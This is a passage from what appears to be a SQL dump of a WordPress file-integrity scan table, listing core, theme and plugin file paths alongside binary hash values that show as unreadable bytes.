?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�֒盉� ��N��','P�M�I؇����d�>0B/\n�-��ըnҕ�','',0,'?'),('\"Y��:n���A���N','wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php',0,'9�r�޳+4e��|<','9�r�޳+4e��|<','y��g�~�1��j�	�]���/�����(ܮ','',0,'?'),('\"oT��ٌj� mix','wp-content/plugins/unyson/framework/extensions/backups/views/archives.php',0,'0�O`�V@d��','0�O`�V@d��','�u;��q�U���(�Q�\0e����+y����vQ�','',0,'?'),('\"�\r�o�]\r:T0ۓ�%','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����k/Fc��t�','���J��%���g�����\0L;�7��R�','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�c�ãʛ\Z�m,nF','hCt��\r!5�*�u;\Z޼��a1���','',0,'?'),('\"�ҀϦ�?����(','wp-content/themes/hueman/assets/front/js/ie/html5shiv-printshiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T@�п4y���Rv','\0X����n���zlTr��\"�B�\r���)��P','',0,'?'),('\"���[����ﻱ��','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/class-fw-ext-backups-task-type-download-type-register.php',0,'�DF&G�+�\r��pw�','�DF&G�+�\r��pw�','�>�f��ж�	���,��k�]ۉ���L��oq','',0,'?'),('\"�U�s-�ˆlŒ24�','wp-content/themes/sg-window/publication/inc/back-compat.php',0,'�R{�ͣ\0�i�Y\\&7','�R{�ͣ\0�i�Y\\&7','n�D�ux)�ܧV�#W-�K(�.�\n���','',0,'?'),('\"�\\�;T��4���X�','wp-content/themes/twentytwenty/inc/svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-kE!�v�/���Mg��','D������v���:��8(uG��4\r','',0,'?'),('\"�MYU�;��}�KZ�k','wp-content/themes/hueman/parts/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �M��QV?�B�c`','��M`kY@ I���_L�x��i��{�FƦ5z6��','',0,'?'),('\"��toRN��2�7##0�','wp-content/themes/illdy/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?0(�q΢(ws','�1�C��8\0�,\\�\"�Ó���M��J�҅�a','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�cc�`�p\"l���d8','wp-content/themes/fabulous-fluid/languages/da_DK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�)�y�2FR3zR���','��F��\\H�D��V*�\r�o���6ژCO1bi��','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�$���D��[@o','�X��=e.��>�o�����E�����','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ͷ��,?�i�|�','D�]��y�� B�j�&�kK e��1:��’*�','',0,'?'),('\"ۚ+�Ҽ�y�O]f','wp-content/themes/sg-window/img/icons/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���̓Y�tW�','o\'+㝞��!�q���;,K��wmm�oP�j4_S','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"��Q=㉾�=��d�','wp-content/themes/precious-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�󋶒��n�:Y�\'�v','J�N�\"Śc�iq=W���o���Rz���C�','',0,'?'),('\"�\n�	-�.#�)��','wp-content/themes/mh-magazine-lite/languages/pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�X�C�0��#\'�n�','��V�\\[��\r�Ґ�պ|k��o�]���k','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j�.����n�)','��j3F͆��R���XC�o&݃�(�#�A�0۾','',0,'?'),('#�z1h�����;','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx߰+e�=�SF�','��5,����nR��j�t�ݑ���ʦ/���','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#4��iGv�u+B��.','wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php',0,'3e�f��	�\\�Eb�','3e�f��	�\\�Eb�','���a����I!���˖k�Ecc��#~�O�v','',0,'?'),('#=��e���T�','wp-content/plugins/unyson/framework/core/components/extensions/manager/views/extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h�`���[?hl-','mT���-O���8�_hUm�Qɝ+�(�o0M','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G$wR~c�����','�g+\'\"��e���=k)%�����8����','',0,'?'),('#Gp\\���=�e�_','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/de.js',0,'���x\n������\0�','���x\n������\0�','�N�{�8��\n%�\'�W�m�x|֝��L�S���','',0,'?'),('#Iڔ���Z��r�,�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extension-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��Yv�_+`D���','+���ꤿ&ڢrRT���a��7','',0,'?'),('#Y��K�.�榱��^','wp-content/themes/alpha-store/sidebar-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=;�	���8������','TBf~?rL3�>� �.YT搫�*A���\'','',0,'?'),('#j\"\'��\n�<�t��a','wp-content/themes/wen-business/third-party/bootstrap/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tt�D���D�ĉ:','Iu�7;��)2���ʕ+ۑ>��M�Q٤�r�','',0,'?'),('#o�I��@���dG','wp-content/themes/panoramic/library/images/search_btn_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H7��z��V�_7�','�-�A�N��i����ߣD��8;�8=�\0o����C','',0,'?'),('#rY���+W��*p��','wp-content/themes/aqueduct/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꨩ�[�}�j�\r�5','�\'�oBo?�=P�HW=��-��4�-m�7��t�','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('#�ɴ��.\n�I|+�ɼ�','wp-content/plugins/contact-form-7/modules/really-simple-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\0�Y�~(31�\'Y�','{Gu69���7�/z�q@�\nz�r�W3\Zms~�','',0,'?'),('#��$C�^`���,\0�','wp-content/plugins/unyson/framework/includes/option-types/typography/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n+�w��+Z�X@�+�','CWZ40�1��jDuV�g\"��B����֝5�2=3','',0,'?'),('#���:w41�nhE|\n�','wp-content/themes/accelerate/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('#�/���(����m(���','wp-content/themes/square/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��3\rl��a�XZ','���!D��E�=��vQ�[�{���,����','',0,'?'),('#�QCw��3e���X�9�','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��\0����7���','@U���JL�$)\ZO\\|��bS|o�R˜���','',0,'?'),('#�}s���a��a��,!','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O65�б��!(DS�w','\'K�Fp�C���A�(^>�Ur�\0��@r3��8','',0,'?'),('#�-g�\\L%3�S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0	��6�ӭ�Iv����hJ��`����','',0,'?'),('#�~Z�|��q픑xf�','wp-content/themes/mh-magazine-lite/languages/nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','piۺ�Ȳo]�dEX','-9`6���b/a}XA��R�o6#�R���%�7ڟ�','',0,'?'),('#��Ą�d�-���','wp-content/themes/hueman/assets/front/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5T��Yr�R��PBK4','K�C�ym�$�}�.ٖ���6���\\/1�p','',0,'?'),('#��,j�C�$���WM�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��\\���z\'_���','c(b9~��D7��f��3y��ͫ]�4\\d@��F9�','',0,'?'),('#�u�g��\ZC��8�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_labels.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��@��-��פ','+/ܳ��j��\rz�����V��Ϙ^\"v@I�ˉ69','',0,'?'),('#�/�@	����[���','wp-content/themes/alpha-store/lib/welcome/sections/woo-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�R;���JGA��','舳_h��E�A|��]�õ�B6�Sz����(\0','',0,'?'),('#�\\sH��S�F���K','wp-content/themes/skt-construction-lite/images/call-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˊK٩]����M�D','#B�4tS�&���c�@H���σ���Z�z|','',0,'?'),('#�ףqX���-��5','wp-content/themes/sg-window/img/3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eð��\'_D)O��0','g|����W��Fs3�M6:�����M\r4�#v�K','',0,'?'),('#�$����3H���)�','wp-content/themes/hueman/assets/front/img/thumb-medium-empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DR�����^U��a','��h�!�u�3�+��\0�\\�o/\"���c��o�W','',0,'?'),('#�n0\\�Z�P�37�WN','wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('#�K7:۰�#^S��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.melbourneit.php',0,'���\r�s>�l���K','���\r�s>�l���K','7�S\Z����/�Ф{s�+�\"�]�/�N�J>','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�����\0vB���B�	�','wp-content/themes/aqueduct/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���\r)�cR6��\0F�','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),('#�4\n�e�4^&R��{�','wp-content/plugins/wordfence/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D���T�B�`����','�\"���w�^s�.�$o�4ʻo���޹��߹T@4','',0,'?'),('$\\��Q���L?�1&�{','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�R>�o<ni��~','�� �EE�z,ݧ��I����A��q�`G��','',0,'?'),('$lj\n7����+�*�','wp-content/themes/accelerate/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Sr��e��0�','x\n�6z�QaKQ�h�:T��W�61�7M�h�Rb�','',0,'?'),('$ز�Le%q�s���','wp-content/plugins/unyson/framework/extensions/shortcodes/static/js/load-shortcodes-data.js',0,'ZD���kx���Vj��J','ZD���kx���Vj��J','#.LL���k�%L�㖺�����\"j�W���','',0,'?'),('$��M=6r.���2�','wp-content/themes/hueman/assets/front/img/demo/11-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dɀ��t�\\R�%��1}4','��)��`S9���}m���*xX�z����{�','',0,'?'),('$\"�i�]3\\�n�WD�','wp-content/plugins/contact-form-7-designer/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�Rx���̲�b�','-ׄ���lBx:==5�\n�E_\"W@1��]�','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�<\0cA�F�L��N','R]`�[��2��#�X��Éi(�E\n`��rJ�','',0,'?'),('$9h��Oa��?��\\','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_clearfix.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\0%����\0�h�','���΍B}�U;|δPx3�{�A�L��[G�','',0,'?'),('$>���џ:h	m\'�L','wp-content/themes/hueman/assets/front/img/header/california.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X���z[;r�ľ��\\','��ۃ��v��pѰ�{�O���{@[(�','',0,'?'),('$J�����;�@��.�','wp-content/themes/point/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0v�v�E�Z�#�','{�չj2\'����FTD9����JLɛ4ԝ3��','',0,'?'),('$iv)�toT�Sus[<','wp-content/themes/hueman/assets/front/js/_parts/_main_jquery_plugins.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ܿ�V��:vrr���','��Ű��%9���-/,�\"��b�|Y<(\'�����','',0,'?'),('$mБI�%�A�L�~�','wp-content/themes/nirvana/content/content-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������^���k�4','��͑2����ա��VI�G�S,�qQ���W','',0,'?'),('$t��B��\r�G�ց/�','wp-content/themes/skt-construction-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^����%��ڐ','�s�@3h�fn�MP��������U2h�x>���lG','',0,'?'),('$�W����O���J?�t','wp-content/themes/illdy/layout/images/front-page/front-page-counter.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w6xZMghMϽ��','�\Z��FS��N�k��泫}M�I�d�F��L','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^��њO���i','5Qg��wB��H.f��<�<Zh&�V�','',0,'?'),('$�V��|�hhy����','wp-content/themes/twentytwenty/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���#C���4Y�','T�Z�e��g�ҫR��!M��x�0�^�l\r�','',0,'?'),('$�F9�y��=6U���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.dreamhost.php',0,'�l��]0�+څ�\Z\Z','�l��]0�+څ�\Z\Z','�K��齴\r�*E�{\0�����F�&���q|*�','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��[74Zz�HW','R�J��‚ޤzO�ky����;�F��k','',0,'?'),('$��P���Xu�����','wp-content/plugins/wordpress-seo/inc/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('$чY9<�}���W�a�','wp-content/themes/aqueduct/blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���#��ǰ��','�.�\\ٜv����S82fp;�mz���uktK�@<','',0,'?'),('$�v�9džH�ŗ��� �','wp-content/themes/illdy/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�[)��EH���[��Y','�B(âl�扻Bq�3�@�\Z���%�u�','',0,'?'),('$���e߹�=���2D','wp-content/themes/nirvana/templates/template-twocolumns-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��4�=s�,n�^�',';�%!�g���|�C^m���w]���[�.�','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����Ӛ%=Z�&3','�s�R�#bǟy��,�K=�l�!�Ϩ�t��.','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$�0/� B]�)����','wp-content/themes/hueman/option-tree/assets/fonts/option-tree-font.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����paЀ\\|�\Z','�����pY����~�D)���D/\n5�z�qr','',0,'?'),('$�>��\nt	(�a����I','wp-content/themes/nirvana/fonts/opensans-regular-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�DBF+ݯל�\Z�S','�{oQ��r�@`��k��Z�C�8��������','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$ʉ��9_��)�|1','�Y	&��p��YV2uuY��T�h�0�9�B3','',0,'?'),('$��[�g�2���!S�','wp-content/themes/aqueduct/css/dragfunpanel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sh�9k)�Ch��=|�/','���axWCF)\r��n��L�(N���E?','',0,'?'),('$��߰�R�\r��ab8!','wp-content/plugins/wordpress-seo/vendor/autoload.php',0,'|�[%\r���h','|�[%\r���h','M�V[~6�gx �V����l�SS��*)�iZ�$','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('%#�J����Z�]E��','wp-content/themes/mh-magazine-lite/languages/fi.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a<���ХS�����','ݜ�vx�﷚{�2��^o�WV��F�\nx���','',0,'?'),('%�(��/h?&��U�','wp-content/themes/mh-magazine-lite/languages/pt_PT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�j�̀�ak�$��\Zc','DF��P�e�u�8q�b� ^z����!锍�(�','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/񶆯_�}6��','/�6����}�����Nk�Q�=�/��I�!�','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h	U?�S�s�H�ב�Y��ٳ','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('%?f�E���Ms���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G߻�V�I���','%[	kdT�9���5|�}-����U�$s_�W{�','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%G�B���r-*陌�','wp-content/themes/nirvana/images/columns/cake1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͸�?K�h���$��','��5�}NuB��g\r-[B�@�2\\��o��B`','',0,'?'),('%K`=��0r�K,n����','wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/parsedown/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ځ	����^a���g��\r','is/�wÜ#W��N�����\\��+�����','',0,'?'),('%|���]\0���2Y?>y�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.int.php',0,'�$��\\�ʓ4+1��ZK�','�$��\\�ʓ4+1��ZK�','����F0�\Z����4o�@��?�,��T\Z��','',0,'?'),('%}�M���ha&�6�','wp-content/themes/twentynineteen/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Z�P�s>��I�r','E�0R�p4RR���b\\`����a1&�g�����','',0,'?'),('%�9����d���','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-video/views/view.php',0,'R��Z\'BmuCa�E�H�!','R��Z\'BmuCa�E�H�!','��qE�$�p݇p�5e\n�E.�#.��|�R��','',0,'?'),('%�9`�ب\n�,������','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/backup.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�#���{)�M�Ux��','m����j��A�^Y��ۂ��N��s�y\0�','',0,'?'),('%�Vi{�B�P�ٌh�%�','wp-content/themes/illdy/layout/fonts/font-awesome/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W ����C�~O�E�s','/ن}���W��^�z��&�;tةIY-�y-�.','',0,'?'),('%���V�Ћ]��=w','wp-content/plugins/wordpress-seo/admin/class-config.php',0,'�����y��Vq�S�','�����y��Vq�S�','^�R��Q�ˇ�P�=ب�(�w�T�o�5��-h�','',0,'?'),('%����]��n0�Jfr�','wp-content/plugins/unyson/framework/static/libs/mousewheel/jquery.mousewheel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i���\n,��`�yg��','��y?h�B��P�Vd�p�Y	_v\Z�Dl�','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O3_H9��Yq��ϛ','�c��`\"�9�u��Twq��(��\Z2s��#�M�','',0,'?'),('%�U7TZ�N:��D\nl��','wp-content/plugins/unyson/framework/static/libs/linecons/fonts/linecons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7ˌ\Z�tZ�R�!�x�','Kc;C�e�,N�W���R��8\'��R��� �&@','',0,'?'),('%�h�ndMZ�EԲo�','wp-content/themes/lightly/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�����fv ��Y�D�','`�·n�x��|��;��\Z�X�8�T�T<\0','',0,'?'),('%���K����z\ZeDZ','wp-content/plugins/all-in-one-wp-migration/lib/view/import/import-permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r7�\'ޒx\Z�`=���W`','�>����1�qS@��|>�9�[P3�!��{�*�','',0,'?'),('%�(K��G�9�dˎbQ�','wp-content/themes/fabulous-fluid/images/no-featured-image-1680x720.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�$	����~�G','�\n\n�ae)�i�x�Np����Ϣ�����D,��','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߜ8���]��a','Z��<P���^�k$�>aK�a��G��s*','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�ep4�t�2 ���','wp-content/themes/hueman/assets/czr/css/lib/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DS���p*�\nO�\r�','0��Io�,���_A�j� �x��d��{2��8#','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AfP��W^[G�\0*��','������]��2T�X!�u ��q�o$X�','',0,'?'),('%��ߗ�Ե4$n3\n','wp-content/themes/panoramic/library/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���������3Bs�','��~ۥ�,�E����~��&����0��b���','',0,'?'),('%��\r>����1�m ','wp-content/themes/sg-window/publication/sidebar-menu.php',0,'#�\0)1�4�k=CN�$�','#�\0)1�4�k=CN�$�','ڱ���O_���\rc�����y�ZQA�C�Bm�','',0,'?'),('%��۴Y>��便g5','wp-content/plugins/spam-captcha/core/img/tree_node_minus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jg������?�����','�����IU׆�hM��S7���H]0�5{��','',0,'?'),('%���z^�&��j�','wp-content/themes/illdy/page-templates/no-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6#g\nX���R.�N�','���W�`m���/��,�\Zؔ,�$�Y=�̿�','',0,'?'),('%쮳�CS��[����','wp-content/themes/the-minimal/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cx��JQN�xm�@9','b���%j����-�l~�N>��h��1�f}{�','',0,'?'),('%�rn�	�������','wp-content/themes/hueman/functions/init-prevdem.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�E����|/7@Qr�','u2񅶾5�\r�����z�HȨ��Z��?ܚ܈?','',0,'?'),('&U�s�g�#�z�ȩ�','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �c���w_�E�','9h�H㻿*�o���\r��-z�������_%� ���','',0,'?'),('&�Z:.�T@��[@~','wp-content/themes/aqueduct/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l8�y�Y�P�T0','���=�|<&f�鳠ΰ��S{����L0r|���','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&&�\"����y�Vg�S','wp-content/themes/supernews/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��WtR�y��Jqg#P','�,P��\'&n�������L�,p�o���}4��c�','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&.��C���F�h\\-�2','wp-content/themes/twentytwentyone/inc/menu-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8\0�=5xv���3�','��y��\nI����\\��d��0����M�U','',0,'?'),('&6�J&J9G�W��2','wp-content/themes/nirvana/fonts/opensans-regular-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˉM�|���*Sa','�n*(�z�kQ�YK��w}���eE��;�4�','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('&W